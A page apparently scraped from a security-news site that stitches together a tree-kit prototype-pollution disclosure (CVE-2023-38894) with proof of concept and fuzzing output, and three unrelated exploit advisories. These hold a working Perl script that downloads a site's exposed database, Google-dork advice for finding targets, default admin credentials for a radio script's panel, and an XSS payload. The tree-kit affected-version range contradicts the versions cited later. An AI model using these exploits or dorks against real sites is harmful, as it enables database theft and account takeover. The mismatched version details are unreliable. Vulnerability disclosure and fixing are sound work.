The prototype pollution can be initiated via the extend function when option unflat is set. Here is an example:

const treekit \= require("tree-kit");

treekit.extend({unflat: true}, {}, {'constructor.prototype.polluted': true});  
console.log({}.polluted); // prints "true

**Impact and Risks**

An attacker-controlled object, e.g. data in JSON format received over the network and parsed by the application using tree-kit's extend function, can be used to pollute the prototype of the Object.prototype by adding and overwriting its data and functions. These data and functions will be available in all objects created henceforth.

Depending on the application that uses the tree-kit library, this vulnerability can result in follow-up issues, such as:

*   Remote code execution (RCE)
*   A denial of service attack (DoS) by overriding some built-in functions (e.g. toString)
*   Authentication/validation bypass
*   Privilege escalation
*   Cross-site scripting (XSS)

  
**Mitigation and Remediation**

The maintainers have already released an update fixing the issue. Versions from 6.10.0 to 7.2.4 are affected and thus vulnerable to Prototype Pollution. We strongly recommend that impacted users upgrade to the newer version that includes the fixes, i.e., version 7.2.4 and above.

**How Did We Find It?**

We found the issue by using our JavaScript fuzzer: Jazzer.js. Here is the setup to reproduce the issue using Jazzer.js:

The _fuzz.j_s file:

const treekit \= require("tree-kit");  
module.exports.fuzzFn \= function(data) {  
    try {  
 treekit.extend({ unflat: true }, {}, JSON.parse(data.toString()));  
    } catch(e){}  
}

Notable info in the package.json is the script for running the fuzzer:

{  
    "scripts": {  
        "fuzz": "jazzer fuzz -f fuzzFn -i tree-kit --sync -- -dict=dict.txt"  
    },  
    "dependencies": {  
        "tree-kit": "0.7.4"  
    },  
    "devDependencies": {  
        "@jazzer.js/core": "^1.6.1"  
    }  
}

The extend function expects valid objects that we provide to it using JSON.parse().  
However, the fuzzer will usually spend some time finding inputs that result in valid JavaScript objects.  
To help it out a bit, we this into the dictionary file dict.txt:

"{\\"test\\": {\\"property\\": \\"true\\"}}"

Running the script with npm run fuzz command results in the following output (“...” means some lines were deleted):

\> fuzz  
\> jazzer fuzz -f fuzzFn -i tree-kit --sync -- -dict=dict.txt  
...  
INFO: Seed: 1508363828  
...  
#3190   NEW    cov: 71 ft: 71 corp: 3/33b lim: 33 exec/s: 0 rss: 155Mb L: 31/31 MS: 3 InsertByte-EraseBytes-ManualDict- DE: "{\\"test\\": {\\"property\\": \\"true\\"}}"-  
#3195   REDUCE cov: 71 ft: 71 corp: 3/32b lim: 33 exec/s: 0 rss: 155Mb L: 30/30 MS: 5 CopyPart-EraseBytes-CopyPart-ChangeBinInt-PersAutoDict- DE: "{\\"test\\": {\\"property\\": \\"true\\"}}"-  
#3537   REDUCE cov: 71 ft: 71 corp: 3/29b lim: 33 exec/s: 0 rss: 155Mb L: 27/27 MS: 2 PersAutoDict-EraseBytes- DE: "{\\"test\\": {\\"property\\": \\"true\\"}}"-  
#5976   REDUCE cov: 77 ft: 77 corp: 4/63b lim: 43 exec/s: 0 rss: 156Mb L: 41/41 MS: 1 ManualDict- DE: "constructor.prototype"-  
...  
#17090  REDUCE cov: 82 ft: 101 corp: 15/583b lim: 98 exec/s: 0 rss: 159Mb L: 89/89 MS: 1 EraseBytes-  
\==3524== Prototype Pollution: Prototype of Object changed. Additional properties in object1: { 'tre0': \[object Object\] }

MS: 1 ManualDict- DE: "\_\_proto\_\_"-; base unit: 2ccbd755e648bb96a1a46ed5c9b80d7fab5d3e5e  
0x7b,0x22,0x63,0x6f,0x6e,0x73,0x2e,0x5f,0x5f,0x70,0x72,0x6f,0x74,0x6f,0x5f,0x5f,0x2e,0x74,0x72,0x65,0x30,0x22,0x3a,0x20,0x7b,0x22,0x70,0x72,0x72,0x22,0x3a,0x20,0x22,0x74,0x61,0x22,0x7d,0x7d,  
{\\"cons.\_\_proto\_\_.tre0\\": {\\"prr\\": \\"ta\\"}}  
artifact\_prefix='./'; Test unit written to ./crash-ba1a28a50be4cbbe5f3f70e965ff37bc7e685a12  
Base64: eyJjb25zLl9fcHJvdG9fXy50cmUwIjogeyJwcnIiOiAidGEifX0=

**Prototype Pollution Attacks**

Prototype pollution vulnerabilities in JavaScript typically involve user-supplied data that is not properly validated or sanitized. By carefully crafting input that influences object creation or manipulation, an attacker can modify the prototype chain and introduce malicious properties or methods. This manipulation can occur in third-party libraries, frameworks, or even custom code.

**References**

*   Reserved CVE ID: CVE-2023-38894
*   Release: https://github.com/cronvel/tree-kit/releases/tag/v0.7.5
*   Commit with fix: https://github.com/cronvel/tree-kit/commit/61bf10cf0dbddaeea3f198cfe7cb469f360d82bc

**Acknowledgments**

We thank Cédric Ronvel for responding to the issue and providing a quick fix and a new release.

CVE-2023-38894: New Vulnerability in tree-kit: Prototype Pollution - CVE-2023-38894 (reserved)

ExcessWeb and Network CMS version 4.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               |  
| # Vendor    : http://www.excessweb.co.th/                                                                                        |    
| # Dork      : Powered by ExcessWeb & Network                                                                                     |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# ExcessWeb & Network CMS v4.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/Webdatas.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

ExcessWeb And Network CMS 4.0 Database Disclosure

Evsanati Radyo version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : evsanati radyo v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti/                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave default credentials installed after installation.[+] Use Payload : user & pass = admin [+] panel = yonetim[+] http://127.0.0.1/wwwkacikfmcom/yonetim/home.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Evsanati Radyo 1.0 Insecure Settings

Event Locations CMS version 1.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS v1.0.1 - XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] click 2 creat a Nouveau RDV & use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/cutgg/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#google